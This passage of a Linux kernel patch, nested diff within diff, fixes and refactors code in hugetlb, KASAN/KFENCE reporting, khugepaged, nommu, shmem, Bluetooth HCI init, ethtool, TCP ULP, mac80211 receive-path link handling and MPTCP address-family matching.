++			/* No other markers apply for now. */
++			WARN_ON_ONCE(!pte_marker_uffd_wp(pte));
+ 			if (uffd_wp_resolve)
++				/* Safe to modify directly (non-present->none). */
+ 				huge_pte_clear(mm, address, ptep, psize);
+-		}
+-		if (!huge_pte_none(pte)) {
++		} else if (!huge_pte_none(pte)) {
+ 			pte_t old_pte;
+ 			unsigned int shift = huge_page_shift(hstate_vma(vma));
+ 
+@@ -7386,26 +7410,21 @@ void move_hugetlb_state(struct page *oldpage, struct page *newpage, int reason)
+ 	}
+ }
+ 
+-/*
+- * This function will unconditionally remove all the shared pmd pgtable entries
+- * within the specific vma for a hugetlbfs memory range.
+- */
+-void hugetlb_unshare_all_pmds(struct vm_area_struct *vma)
++static void hugetlb_unshare_pmds(struct vm_area_struct *vma,
++				   unsigned long start,
++				   unsigned long end)
+ {
+ 	struct hstate *h = hstate_vma(vma);
+ 	unsigned long sz = huge_page_size(h);
+ 	struct mm_struct *mm = vma->vm_mm;
+ 	struct mmu_notifier_range range;
+-	unsigned long address, start, end;
++	unsigned long address;
+ 	spinlock_t *ptl;
+ 	pte_t *ptep;
+ 
+ 	if (!(vma->vm_flags & VM_MAYSHARE))
+ 		return;
+ 
+-	start = ALIGN(vma->vm_start, PUD_SIZE);
+-	end = ALIGN_DOWN(vma->vm_end, PUD_SIZE);
+-
+ 	if (start >= end)
+ 		return;
+ 
+@@ -7437,6 +7456,16 @@ void hugetlb_unshare_all_pmds(struct vm_area_struct *vma)
+ 	mmu_notifier_invalidate_range_end(&range);
+ }
+ 
++/*
++ * This function will unconditionally remove all the shared pmd pgtable entries
++ * within the specific vma for a hugetlbfs memory range.
++ */
++void hugetlb_unshare_all_pmds(struct vm_area_struct *vma)
++{
++	hugetlb_unshare_pmds(vma, ALIGN(vma->vm_start, PUD_SIZE),
++			ALIGN_DOWN(vma->vm_end, PUD_SIZE));
++}
++
+ #ifdef CONFIG_CMA
+ static bool cma_reserve_called __initdata;
+ 
+diff --git a/mm/kasan/report.c b/mm/kasan/report.c
+index df3602062bfd6..cc98dfdd3ed2f 100644
+--- a/mm/kasan/report.c
++++ b/mm/kasan/report.c
+@@ -164,8 +164,8 @@ static void end_report(unsigned long *flags, void *addr)
+ 				       (unsigned long)addr);
+ 	pr_err("==================================================================\n");
+ 	spin_unlock_irqrestore(&report_lock, *flags);
+-	if (panic_on_warn && !test_bit(KASAN_BIT_MULTI_SHOT, &kasan_flags))
+-		panic("panic_on_warn set ...\n");
++	if (!test_bit(KASAN_BIT_MULTI_SHOT, &kasan_flags))
++		check_panic_on_warn("KASAN");
+ 	if (kasan_arg_fault == KASAN_ARG_FAULT_PANIC)
+ 		panic("kasan.fault=panic set ...\n");
+ 	add_taint(TAINT_BAD_PAGE, LOCKDEP_NOW_UNRELIABLE);
+diff --git a/mm/kfence/report.c b/mm/kfence/report.c
+index 46ecea18c4ca0..60205f1257ef2 100644
+--- a/mm/kfence/report.c
++++ b/mm/kfence/report.c
+@@ -273,8 +273,7 @@ void kfence_report_error(unsigned long address, bool is_write, struct pt_regs *r
+ 
+ 	lockdep_on();
+ 
+-	if (panic_on_warn)
+-		panic("panic_on_warn set ...\n");
++	check_panic_on_warn("KFENCE");
+ 
+ 	/* We encountered a memory safety error, taint the kernel! */
+ 	add_taint(TAINT_BAD_PAGE, LOCKDEP_STILL_OK);
+diff --git a/mm/khugepaged.c b/mm/khugepaged.c
+index 3703a56571c12..c982b250aa317 100644
+--- a/mm/khugepaged.c
++++ b/mm/khugepaged.c
+@@ -1467,14 +1467,6 @@ int collapse_pte_mapped_thp(struct mm_struct *mm, unsigned long addr,
+ 	if (!hugepage_vma_check(vma, vma->vm_flags, false, false, false))
+ 		return SCAN_VMA_CHECK;
+ 
+-	/*
+-	 * Symmetry with retract_page_tables(): Exclude MAP_PRIVATE mappings
+-	 * that got written to. Without this, we'd have to also lock the
+-	 * anon_vma if one exists.
+-	 */
+-	if (vma->anon_vma)
+-		return SCAN_VMA_CHECK;
+-
+ 	/* Keep pmd pgtable for uffd-wp; see comment in retract_page_tables() */
+ 	if (userfaultfd_wp(vma))
+ 		return SCAN_PTE_UFFD_WP;
+@@ -1574,8 +1566,14 @@ int collapse_pte_mapped_thp(struct mm_struct *mm, unsigned long addr,
+ 	}
+ 
+ 	/* step 4: remove pte entries */
++	/* we make no change to anon, but protect concurrent anon page lookup */
++	if (vma->anon_vma)
++		anon_vma_lock_write(vma->anon_vma);
++
+ 	collapse_and_free_pmd(mm, vma, haddr, pmd);
+ 
++	if (vma->anon_vma)
++		anon_vma_unlock_write(vma->anon_vma);
+ 	i_mmap_unlock_write(vma->vm_file->f_mapping);
+ 
+ maybe_install_pmd:
+@@ -2646,7 +2644,7 @@ int madvise_collapse(struct vm_area_struct *vma, struct vm_area_struct **prev,
+ 				goto out_nolock;
+ 			}
+ 
+-			hend = vma->vm_end & HPAGE_PMD_MASK;
++			hend = min(hend, vma->vm_end & HPAGE_PMD_MASK);
+ 		}
+ 		mmap_assert_locked(mm);
+ 		memset(cc->node_load, 0, sizeof(cc->node_load));
+diff --git a/mm/mmap.c b/mm/mmap.c
+index 54abd46e60078..1777148868494 100644
+--- a/mm/mmap.c
++++ b/mm/mmap.c
+@@ -1524,6 +1524,10 @@ int vma_wants_writenotify(struct vm_area_struct *vma, pgprot_t vm_page_prot)
+ 	if (vma_soft_dirty_enabled(vma) && !is_vm_hugetlb_page(vma))
+ 		return 1;
+ 
++	/* Do we need write faults for uffd-wp tracking? */
++	if (userfaultfd_wp(vma))
++		return 1;
++
+ 	/* Specialty mapping? */
+ 	if (vm_flags & VM_PFNMAP)
+ 		return 0;
+diff --git a/mm/nommu.c b/mm/nommu.c
+index 214c70e1d0594..5b83938ecb67c 100644
+--- a/mm/nommu.c
++++ b/mm/nommu.c
+@@ -559,7 +559,6 @@ void vma_mas_remove(struct vm_area_struct *vma, struct ma_state *mas)
+ 
+ static void setup_vma_to_mm(struct vm_area_struct *vma, struct mm_struct *mm)
+ {
+-	mm->map_count++;
+ 	vma->vm_mm = mm;
+ 
+ 	/* add the VMA to the mapping */
+@@ -587,6 +586,7 @@ static void mas_add_vma_to_mm(struct ma_state *mas, struct mm_struct *mm,
+ 	BUG_ON(!vma->vm_region);
+ 
+ 	setup_vma_to_mm(vma, mm);
++	mm->map_count++;
+ 
+ 	/* add the VMA to the tree */
+ 	vma_mas_store(vma, mas);
+@@ -1240,6 +1240,7 @@ share:
+ error_just_free:
+ 	up_write(&nommu_region_sem);
+ error:
++	mas_destroy(&mas);
+ 	if (region->vm_file)
+ 		fput(region->vm_file);
+ 	kmem_cache_free(vm_region_jar, region);
+@@ -1250,7 +1251,6 @@ error:
+ 
+ sharing_violation:
+ 	up_write(&nommu_region_sem);
+-	mas_destroy(&mas);
+ 	pr_warn("Attempt to share mismatched mappings\n");
+ 	ret = -EINVAL;
+ 	goto error;
+@@ -1347,6 +1347,7 @@ int split_vma(struct mm_struct *mm, struct vm_area_struct *vma,
+ 	if (vma->vm_file)
+ 		return -ENOMEM;
+ 
++	mm = vma->vm_mm;
+ 	if (mm->map_count >= sysctl_max_map_count)
+ 		return -ENOMEM;
+ 
+@@ -1398,6 +1399,7 @@ int split_vma(struct mm_struct *mm, struct vm_area_struct *vma,
+ 	mas_set_range(&mas, vma->vm_start, vma->vm_end - 1);
+ 	mas_store(&mas, vma);
+ 	vma_mas_store(new, &mas);
++	mm->map_count++;
+ 	return 0;
+ 
+ err_mas_preallocate:
+@@ -1509,7 +1511,8 @@ int do_munmap(struct mm_struct *mm, unsigned long start, size_t len, struct list
+ erase_whole_vma:
+ 	if (delete_vma_from_mm(vma))
+ 		ret = -ENOMEM;
+-	delete_vma(mm, vma);
++	else
++		delete_vma(mm, vma);
+ 	return ret;
+ }
+ 
+diff --git a/mm/shmem.c b/mm/shmem.c
+index 82911fefc2d5e..a8d9fd039d0aa 100644
+--- a/mm/shmem.c
++++ b/mm/shmem.c
+@@ -472,12 +472,10 @@ bool shmem_is_huge(struct vm_area_struct *vma, struct inode *inode,
+ 	if (vma && ((vma->vm_flags & VM_NOHUGEPAGE) ||
+ 	    test_bit(MMF_DISABLE_THP, &vma->vm_mm->flags)))
+ 		return false;
+-	if (shmem_huge_force)
+-		return true;
+-	if (shmem_huge == SHMEM_HUGE_FORCE)
+-		return true;
+ 	if (shmem_huge == SHMEM_HUGE_DENY)
+ 		return false;
++	if (shmem_huge_force || shmem_huge == SHMEM_HUGE_FORCE)
++		return true;
+ 
+ 	switch (SHMEM_SB(inode->i_sb)->huge) {
+ 	case SHMEM_HUGE_ALWAYS:
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 3a68d9bc43b8f..8d6c8cbfe1de4 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -3554,7 +3554,7 @@ static const struct hci_init_stage hci_init2[] = {
+ static int hci_le_read_buffer_size_sync(struct hci_dev *hdev)
+ {
+ 	/* Use Read LE Buffer Size V2 if supported */
+-	if (hdev->commands[41] & 0x20)
++	if (iso_capable(hdev) && hdev->commands[41] & 0x20)
+ 		return __hci_cmd_sync_status(hdev,
+ 					     HCI_OP_LE_READ_BUFFER_SIZE_V2,
+ 					     0, NULL, HCI_CMD_TIMEOUT);
+@@ -3579,10 +3579,10 @@ static int hci_le_read_supported_states_sync(struct hci_dev *hdev)
+ 
+ /* LE Controller init stage 2 command sequence */
+ static const struct hci_init_stage le_init2[] = {
+-	/* HCI_OP_LE_READ_BUFFER_SIZE */
+-	HCI_INIT(hci_le_read_buffer_size_sync),
+ 	/* HCI_OP_LE_READ_LOCAL_FEATURES */
+ 	HCI_INIT(hci_le_read_local_features_sync),
++	/* HCI_OP_LE_READ_BUFFER_SIZE */
++	HCI_INIT(hci_le_read_buffer_size_sync),
+ 	/* HCI_OP_LE_READ_SUPPORTED_STATES */
+ 	HCI_INIT(hci_le_read_supported_states_sync),
+ 	{}
+diff --git a/net/ethtool/ioctl.c b/net/ethtool/ioctl.c
+index 81fe2422fe58a..038398d41a937 100644
+--- a/net/ethtool/ioctl.c
++++ b/net/ethtool/ioctl.c
+@@ -2094,7 +2094,8 @@ static int ethtool_get_phy_stats(struct net_device *dev, void __user *useraddr)
+ 		return n_stats;
+ 	if (n_stats > S32_MAX / sizeof(u64))
+ 		return -ENOMEM;
+-	WARN_ON_ONCE(!n_stats);
++	if (WARN_ON_ONCE(!n_stats))
++		return -EOPNOTSUPP;
+ 
+ 	if (copy_from_user(&stats, useraddr, sizeof(stats)))
+ 		return -EFAULT;
+diff --git a/net/ipv4/tcp_ulp.c b/net/ipv4/tcp_ulp.c
+index 05b6077b9f2c3..2aa442128630e 100644
+--- a/net/ipv4/tcp_ulp.c
++++ b/net/ipv4/tcp_ulp.c
+@@ -139,7 +139,7 @@ static int __tcp_set_ulp(struct sock *sk, const struct tcp_ulp_ops *ulp_ops)
+ 	if (sk->sk_socket)
+ 		clear_bit(SOCK_SUPPORT_ZC, &sk->sk_socket->flags);
+ 
+-	err = -EINVAL;
++	err = -ENOTCONN;
+ 	if (!ulp_ops->clone && sk->sk_state == TCP_LISTEN)
+ 		goto out_err;
+ 
+diff --git a/net/mac80211/agg-tx.c b/net/mac80211/agg-tx.c
+index 07c892aa8c73f..b2e40465289d6 100644
+--- a/net/mac80211/agg-tx.c
++++ b/net/mac80211/agg-tx.c
+@@ -491,7 +491,7 @@ void ieee80211_tx_ba_session_handle_start(struct sta_info *sta, int tid)
+ {
+ 	struct tid_ampdu_tx *tid_tx;
+ 	struct ieee80211_local *local = sta->local;
+-	struct ieee80211_sub_if_data *sdata = sta->sdata;
++	struct ieee80211_sub_if_data *sdata;
+ 	struct ieee80211_ampdu_params params = {
+ 		.sta = &sta->sta,
+ 		.action = IEEE80211_AMPDU_TX_START,
+@@ -521,6 +521,7 @@ void ieee80211_tx_ba_session_handle_start(struct sta_info *sta, int tid)
+ 	 */
+ 	synchronize_net();
+ 
++	sdata = sta->sdata;
+ 	params.ssn = sta->tid_seq[tid] >> 4;
+ 	ret = drv_ampdu_action(local, sdata, &params);
+ 	tid_tx->ssn = params.ssn;
+@@ -534,6 +535,9 @@ void ieee80211_tx_ba_session_handle_start(struct sta_info *sta, int tid)
+ 		 */
+ 		set_bit(HT_AGG_STATE_DRV_READY, &tid_tx->state);
+ 	} else if (ret) {
++		if (!sdata)
++			return;
++
+ 		ht_dbg(sdata,
+ 		       "BA request denied - HW unavailable for %pM tid %d\n",
+ 		       sta->sta.addr, tid);
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index 8c8ef87997a8a..3c66e03774fbe 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -147,6 +147,7 @@ static int ieee80211_set_ap_mbssid_options(struct ieee80211_sub_if_data *sdata,
+ 	link_conf->bssid_index = 0;
+ 	link_conf->nontransmitted = false;
+ 	link_conf->ema_ap = false;
++	link_conf->bssid_indicator = 0;
+ 
+ 	if (sdata->vif.type != NL80211_IFTYPE_AP || !params.tx_wdev)
+ 		return -EINVAL;
+@@ -1511,6 +1512,12 @@ static int ieee80211_stop_ap(struct wiphy *wiphy, struct net_device *dev,
+ 	kfree(link_conf->ftmr_params);
+ 	link_conf->ftmr_params = NULL;
+ 
++	sdata->vif.mbssid_tx_vif = NULL;
++	link_conf->bssid_index = 0;
++	link_conf->nontransmitted = false;
++	link_conf->ema_ap = false;
++	link_conf->bssid_indicator = 0;
++
+ 	__sta_info_flush(sdata, true);
+ 	ieee80211_free_keys(sdata, true);
+ 
+diff --git a/net/mac80211/driver-ops.c b/net/mac80211/driver-ops.c
+index 5392ffa182704..c08d3c9a4a177 100644
+--- a/net/mac80211/driver-ops.c
++++ b/net/mac80211/driver-ops.c
+@@ -391,6 +391,9 @@ int drv_ampdu_action(struct ieee80211_local *local,
+ 
+ 	might_sleep();
+ 
++	if (!sdata)
++		return -EIO;
++
+ 	sdata = get_bss_sdata(sdata);
+ 	if (!check_sdata_in_driver(sdata))
+ 		return -EIO;
+diff --git a/net/mac80211/iface.c b/net/mac80211/iface.c
+index 46f08ec5ed760..8dd3c10a99e0b 100644
+--- a/net/mac80211/iface.c
++++ b/net/mac80211/iface.c
+@@ -364,7 +364,9 @@ static int ieee80211_check_concurrent_iface(struct ieee80211_sub_if_data *sdata,
+ 
+ 			/* No support for VLAN with MLO yet */
+ 			if (iftype == NL80211_IFTYPE_AP_VLAN &&
+-			    nsdata->wdev.use_4addr)
++			    sdata->wdev.use_4addr &&
++			    nsdata->vif.type == NL80211_IFTYPE_AP &&
++			    nsdata->vif.valid_links)
+ 				return -EOPNOTSUPP;
+ 
+ 			/*
+@@ -2258,7 +2260,6 @@ int ieee80211_if_add(struct ieee80211_local *local, const char *name,
+ 
+ 		ret = cfg80211_register_netdevice(ndev);
+ 		if (ret) {
+-			ieee80211_if_free(ndev);
+ 			free_netdev(ndev);
+ 			return ret;
+ 		}
+diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c
+index f99416d2e1441..3262ebb240926 100644
+--- a/net/mac80211/rx.c
++++ b/net/mac80211/rx.c
+@@ -4070,6 +4070,58 @@ static void ieee80211_invoke_rx_handlers(struct ieee80211_rx_data *rx)
+ #undef CALL_RXH
+ }
+ 
++static bool
++ieee80211_rx_is_valid_sta_link_id(struct ieee80211_sta *sta, u8 link_id)
++{
++	if (!sta->mlo)
++		return false;
++
++	return !!(sta->valid_links & BIT(link_id));
++}
++
++static bool ieee80211_rx_data_set_link(struct ieee80211_rx_data *rx,
++				       u8 link_id)
++{
++	rx->link_id = link_id;
++	rx->link = rcu_dereference(rx->sdata->link[link_id]);
++
++	if (!rx->sta)
++		return rx->link;
++
++	if (!ieee80211_rx_is_valid_sta_link_id(&rx->sta->sta, link_id))
++		return false;
++
++	rx->link_sta = rcu_dereference(rx->sta->link[link_id]);
++
++	return rx->link && rx->link_sta;
++}
++
++static bool ieee80211_rx_data_set_sta(struct ieee80211_rx_data *rx,
++				      struct ieee80211_sta *pubsta,
++				      int link_id)
++{
++	struct sta_info *sta;
++
++	sta = container_of(pubsta, struct sta_info, sta);
++
++	rx->link_id = link_id;
++	rx->sta = sta;
++
++	if (sta) {
++		rx->local = sta->sdata->local;
++		if (!rx->sdata)
++			rx->sdata = sta->sdata;
++		rx->link_sta = &sta->deflink;
++	}
++
++	if (link_id < 0)
++		rx->link = &rx->sdata->deflink;
++	else if (!ieee80211_rx_data_set_link(rx, link_id))
++		return false;
++
++	return true;
++}
++
+ /*
+  * This function makes calls into the RX path, therefore
+  * it has to be invoked under RCU read lock.
+@@ -4078,16 +4130,19 @@ void ieee80211_release_reorder_timeout(struct sta_info *sta, int tid)
+ {
+ 	struct sk_buff_head frames;
+ 	struct ieee80211_rx_data rx = {
+-		.sta = sta,
+-		.sdata = sta->sdata,
+-		.local = sta->local,
+ 		/* This is OK -- must be QoS data frame */
+ 		.security_idx = tid,
+ 		.seqno_idx = tid,
+-		.link_id = -1,
+ 	};
+ 	struct tid_ampdu_rx *tid_agg_rx;
+-	u8 link_id;
++	int link_id = -1;
++
++	/* FIXME: statistics won't be right with this */
++	if (sta->sta.valid_links)
++		link_id = ffs(sta->sta.valid_links) - 1;
++
++	if (!ieee80211_rx_data_set_sta(&rx, &sta->sta, link_id))
++		return;
+ 
+ 	tid_agg_rx = rcu_dereference(sta->ampdu_mlme.tid_rx[tid]);
+ 	if (!tid_agg_rx)
+@@ -4107,10 +4162,6 @@ void ieee80211_release_reorder_timeout(struct sta_info *sta, int tid)
+ 		};
+ 		drv_event_callback(rx.local, rx.sdata, &event);
+ 	}
+-	/* FIXME: statistics won't be right with this */
+-	link_id = sta->sta.valid_links ? ffs(sta->sta.valid_links) - 1 : 0;
+-	rx.link = rcu_dereference(sta->sdata->link[link_id]);
+-	rx.link_sta = rcu_dereference(sta->link[link_id]);
+ 
+ 	ieee80211_rx_handlers(&rx, &frames);
+ }
+@@ -4126,7 +4177,6 @@ void ieee80211_mark_rx_ba_filtered_frames(struct ieee80211_sta *pubsta, u8 tid,
+ 		/* This is OK -- must be QoS data frame */
+ 		.security_idx = tid,
+ 		.seqno_idx = tid,
+-		.link_id = -1,
+ 	};
+ 	int i, diff;
+ 
+@@ -4137,10 +4187,8 @@ void ieee80211_mark_rx_ba_filtered_frames(struct ieee80211_sta *pubsta, u8 tid,
+ 
+ 	sta = container_of(pubsta, struct sta_info, sta);
+ 
+-	rx.sta = sta;
+-	rx.sdata = sta->sdata;
+-	rx.link = &rx.sdata->deflink;
+-	rx.local = sta->local;
++	if (!ieee80211_rx_data_set_sta(&rx, pubsta, -1))
++		return;
+ 
+ 	rcu_read_lock();
+ 	tid_agg_rx = rcu_dereference(sta->ampdu_mlme.tid_rx[tid]);
+@@ -4527,15 +4575,6 @@ void ieee80211_check_fast_rx_iface(struct ieee80211_sub_if_data *sdata)
+ 	mutex_unlock(&local->sta_mtx);
+ }
+ 
+-static bool
+-ieee80211_rx_is_valid_sta_link_id(struct ieee80211_sta *sta, u8 link_id)
+-{
+-	if (!sta->mlo)
+-		return false;
+-
+-	return !!(sta->valid_links & BIT(link_id));
+-}
+-
+ static void ieee80211_rx_8023(struct ieee80211_rx_data *rx,
+ 			      struct ieee80211_fast_rx *fast_rx,
+ 			      int orig_len)
+@@ -4646,7 +4685,6 @@ static bool ieee80211_invoke_fast_rx(struct ieee80211_rx_data *rx,
+ 	struct sk_buff *skb = rx->skb;
+ 	struct ieee80211_hdr *hdr = (void *)skb->data;
+ 	struct ieee80211_rx_status *status = IEEE80211_SKB_RXCB(skb);
+-	struct sta_info *sta = rx->sta;
+ 	int orig_len = skb->len;
+ 	int hdrlen = ieee80211_hdrlen(hdr->frame_control);
+ 	int snap_offs = hdrlen;
+@@ -4658,7 +4696,6 @@ static bool ieee80211_invoke_fast_rx(struct ieee80211_rx_data *rx,
+ 		u8 da[ETH_ALEN];
+ 		u8 sa[ETH_ALEN];
+ 	} addrs __aligned(2);
+-	struct link_sta_info *link_sta;
+ 	struct ieee80211_sta_rx_stats *stats;
+ 
+ 	/* for parallel-rx, we need to have DUP_VALIDATED, otherwise we write
+@@ -4761,18 +4798,10 @@ static bool ieee80211_invoke_fast_rx(struct ieee80211_rx_data *rx,
+  drop:
+ 	dev_kfree_skb(skb);
+ 
+-	if (rx->link_id >= 0) {
+-		link_sta = rcu_dereference(sta->link[rx->link_id]);
+-		if (!link_sta)
+-			return true;
+-	} else {
+-		link_sta = &sta->deflink;
+-	}
+-
+ 	if (fast_rx->uses_rss)
+-		stats = this_cpu_ptr(link_sta->pcpu_rx_stats);
++		stats = this_cpu_ptr(rx->link_sta->pcpu_rx_stats);
+ 	else
+-		stats = &link_sta->rx_stats;
++		stats = &rx->link_sta->rx_stats;
+ 
+ 	stats->dropped++;
+ 	return true;
+@@ -4790,8 +4819,8 @@ static bool ieee80211_prepare_and_rx_handle(struct ieee80211_rx_data *rx,
+ 	struct ieee80211_local *local = rx->local;
+ 	struct ieee80211_sub_if_data *sdata = rx->sdata;
+ 	struct ieee80211_hdr *hdr = (void *)skb->data;
+-	struct link_sta_info *link_sta = NULL;
+-	struct ieee80211_link_data *link;
++	struct link_sta_info *link_sta = rx->link_sta;
++	struct ieee80211_link_data *link = rx->link;
+ 
+ 	rx->skb = skb;
+ 
+@@ -4813,35 +4842,6 @@ static bool ieee80211_prepare_and_rx_handle(struct ieee80211_rx_data *rx,
+ 	if (!ieee80211_accept_frame(rx))
+ 		return false;
+ 
+-	if (rx->link_id >= 0) {
+-		link = rcu_dereference(rx->sdata->link[rx->link_id]);
+-
+-		/* we might race link removal */
+-		if (!link)
+-			return true;
+-		rx->link = link;
+-
+-		if (rx->sta) {
+-			rx->link_sta =
+-				rcu_dereference(rx->sta->link[rx->link_id]);
+-			if (!rx->link_sta)
+-				return true;
+-		}
+-	} else {
+-		if (rx->sta)
+-			rx->link_sta = &rx->sta->deflink;
+-
+-		rx->link = &sdata->deflink;
+-	}
+-
+-	if (unlikely(!is_multicast_ether_addr(hdr->addr1) &&
+-		     rx->link_id >= 0 && rx->sta && rx->sta->sta.mlo)) {
+-		link_sta = rcu_dereference(rx->sta->link[rx->link_id]);
+-
+-		if (WARN_ON_ONCE(!link_sta))
+-			return true;
+-	}
+-
+ 	if (!consume) {
+ 		struct skb_shared_hwtstamps *shwt;
+ 
+@@ -4861,7 +4861,7 @@ static bool ieee80211_prepare_and_rx_handle(struct ieee80211_rx_data *rx,
+ 		shwt->hwtstamp = skb_hwtstamps(skb)->hwtstamp;
+ 	}
+ 
+-	if (unlikely(link_sta)) {
++	if (unlikely(rx->sta && rx->sta->sta.mlo)) {
+ 		/* translate to MLD addresses */
+ 		if (ether_addr_equal(link->conf->addr, hdr->addr1))
+ 			ether_addr_copy(hdr->addr1, rx->sdata->vif.addr);
+@@ -4891,6 +4891,7 @@ static void __ieee80211_rx_handle_8023(struct ieee80211_hw *hw,
+ 	struct ieee80211_rx_status *status = IEEE80211_SKB_RXCB(skb);
+ 	struct ieee80211_fast_rx *fast_rx;
+ 	struct ieee80211_rx_data rx;
++	int link_id = -1;
+ 
+ 	memset(&rx, 0, sizeof(rx));
+ 	rx.skb = skb;
+@@ -4907,12 +4908,8 @@ static void __ieee80211_rx_handle_8023(struct ieee80211_hw *hw,
+ 	if (!pubsta)
+ 		goto drop;
+ 
+-	rx.sta = container_of(pubsta, struct sta_info, sta);
+-	rx.sdata = rx.sta->sdata;
+-
+-	if (status->link_valid &&
+-	    !ieee80211_rx_is_valid_sta_link_id(pubsta, status->link_id))
+-		goto drop;
++	if (status->link_valid)
++		link_id = status->link_id;
+ 
+ 	/*
+ 	 * TODO: Should the frame be dropped if the right link_id is not
+@@ -4921,19 +4918,8 @@ static void __ieee80211_rx_handle_8023(struct ieee80211_hw *hw,
+ 	 * link_id is used only for stats purpose and updating the stats on
+ 	 * the deflink is fine?
+ 	 */
+-	if (status->link_valid)
+-		rx.link_id = status->link_id;
+-
+-	if (rx.link_id >= 0) {
+-		struct ieee80211_link_data *link;
+-
+-		link =  rcu_dereference(rx.sdata->link[rx.link_id]);
+-		if (!link)
+-			goto drop;
+-		rx.link = link;
+-	} else {
+-		rx.link = &rx.sdata->deflink;
+-	}
++	if (!ieee80211_rx_data_set_sta(&rx, pubsta, link_id))
++		goto drop;
+ 
+ 	fast_rx = rcu_dereference(rx.sta->fast_rx);
+ 	if (!fast_rx)
+@@ -4951,6 +4937,8 @@ static bool ieee80211_rx_for_interface(struct ieee80211_rx_data *rx,
+ {
+ 	struct link_sta_info *link_sta;
+ 	struct ieee80211_hdr *hdr = (void *)skb->data;
++	struct sta_info *sta;
++	int link_id = -1;
+ 
+ 	/*
+ 	 * Look up link station first, in case there's a
+@@ -4960,24 +4948,19 @@ static bool ieee80211_rx_for_interface(struct ieee80211_rx_data *rx,
+ 	 */
+ 	link_sta = link_sta_info_get_bss(rx->sdata, hdr->addr2);
+ 	if (link_sta) {
+-		rx->sta = link_sta->sta;
+-		rx->link_id = link_sta->link_id;
++		sta = link_sta->sta;
++		link_id = link_sta->link_id;
+ 	} else {
+ 		struct ieee80211_rx_status *status = IEEE80211_SKB_RXCB(skb);
+ 
+-		rx->sta = sta_info_get_bss(rx->sdata, hdr->addr2);
+-		if (rx->sta) {
+-			if (status->link_valid &&
+-			    !ieee80211_rx_is_valid_sta_link_id(&rx->sta->sta,
+-							       status->link_id))
+-				return false;
+-
+-			rx->link_id = status->link_valid ? status->link_id : -1;
+-		} else {
+-			rx->link_id = -1;
+-		}
++		sta = sta_info_get_bss(rx->sdata, hdr->addr2);
++		if (status->link_valid)
++			link_id = status->link_id;
+ 	}
+ 
++	if (!ieee80211_rx_data_set_sta(rx, &sta->sta, link_id))
++		return false;
++
+ 	return ieee80211_prepare_and_rx_handle(rx, skb, consume);
+ }
+ 
+@@ -5036,19 +5019,15 @@ static void __ieee80211_rx_handle_packet(struct ieee80211_hw *hw,
+ 
+ 	if (ieee80211_is_data(fc)) {
+ 		struct sta_info *sta, *prev_sta;
+-		u8 link_id = status->link_id;
++		int link_id = -1;
+ 
+-		if (pubsta) {
+-			rx.sta = container_of(pubsta, struct sta_info, sta);
+-			rx.sdata = rx.sta->sdata;
++		if (status->link_valid)
++			link_id = status->link_id;
+ 
+-			if (status->link_valid &&
+-			    !ieee80211_rx_is_valid_sta_link_id(pubsta, link_id))
++		if (pubsta) {
++			if (!ieee80211_rx_data_set_sta(&rx, pubsta, link_id))
+ 				goto out;
+ 
+-			if (status->link_valid)
+-				rx.link_id = status->link_id;
+-
+ 			/*
+ 			 * In MLO connection, fetch the link_id using addr2
+ 			 * when the driver does not pass link_id in status.
+@@ -5066,7 +5045,7 @@ static void __ieee80211_rx_handle_packet(struct ieee80211_hw *hw,
+ 				if (!link_sta)
+ 					goto out;
+ 
+-				rx.link_id = link_sta->link_id;
++				ieee80211_rx_data_set_link(&rx, link_sta->link_id);
+ 			}
+ 
+ 			if (ieee80211_prepare_and_rx_handle(&rx, skb, true))
+@@ -5082,30 +5061,27 @@ static void __ieee80211_rx_handle_packet(struct ieee80211_hw *hw,
+ 				continue;
+ 			}
+ 
+-			if ((status->link_valid &&
+-			     !ieee80211_rx_is_valid_sta_link_id(&prev_sta->sta,
+-								link_id)) ||
+-			    (!status->link_valid && prev_sta->sta.mlo))
++			rx.sdata = prev_sta->sdata;
++			if (!ieee80211_rx_data_set_sta(&rx, &prev_sta->sta,
++						       link_id))
++				goto out;
++
++			if (!status->link_valid && prev_sta->sta.mlo)
+ 				continue;
+ 
+-			rx.link_id = status->link_valid ? link_id : -1;
+-			rx.sta = prev_sta;
+-			rx.sdata = prev_sta->sdata;
+ 			ieee80211_prepare_and_rx_handle(&rx, skb, false);
+ 
+ 			prev_sta = sta;
+ 		}
+ 
+ 		if (prev_sta) {
+-			if ((status->link_valid &&
+-			     !ieee80211_rx_is_valid_sta_link_id(&prev_sta->sta,
+-								link_id)) ||
+-			    (!status->link_valid && prev_sta->sta.mlo))
++			rx.sdata = prev_sta->sdata;
++			if (!ieee80211_rx_data_set_sta(&rx, &prev_sta->sta,
++						       link_id))
+ 				goto out;
+ 
+-			rx.link_id = status->link_valid ? link_id : -1;
+-			rx.sta = prev_sta;
+-			rx.sdata = prev_sta->sdata;
++			if (!status->link_valid && prev_sta->sta.mlo)
++				goto out;
+ 
+ 			if (ieee80211_prepare_and_rx_handle(&rx, skb, true))
+ 				return;
+diff --git a/net/mptcp/pm.c b/net/mptcp/pm.c
+index 45e2a48397b95..70f0ced3ca86e 100644
+--- a/net/mptcp/pm.c
++++ b/net/mptcp/pm.c
+@@ -420,6 +420,31 @@ void mptcp_pm_subflow_chk_stale(const struct mptcp_sock *msk, struct sock *ssk)
+ 	}
+ }
+ 
++/* if sk is ipv4 or ipv6_only allows only same-family local and remote addresses,
++ * otherwise allow any matching local/remote pair
++ */
++bool mptcp_pm_addr_families_match(const struct sock *sk,
++				  const struct mptcp_addr_info *loc,
++				  const struct mptcp_addr_info *rem)
++{
++	bool mptcp_is_v4 = sk->sk_family == AF_INET;
++
++#if IS_ENABLED(CONFIG_MPTCP_IPV6)
++	bool loc_is_v4 = loc->family == AF_INET || ipv6_addr_v4mapped(&loc->addr6);
++	bool rem_is_v4 = rem->family == AF_INET || ipv6_addr_v4mapped(&rem->addr6);
++
++	if (mptcp_is_v4)
++		return loc_is_v4 && rem_is_v4;
++
++	if (ipv6_only_sock(sk))
++		return !loc_is_v4 && !rem_is_v4;
++
++	return loc_is_v4 == rem_is_v4;
++#else
++	return mptcp_is_v4 && loc->family == AF_INET && rem->family == AF_INET;
++#endif
++}
++
+ void mptcp_pm_data_reset(struct mptcp_sock *msk)
+ {
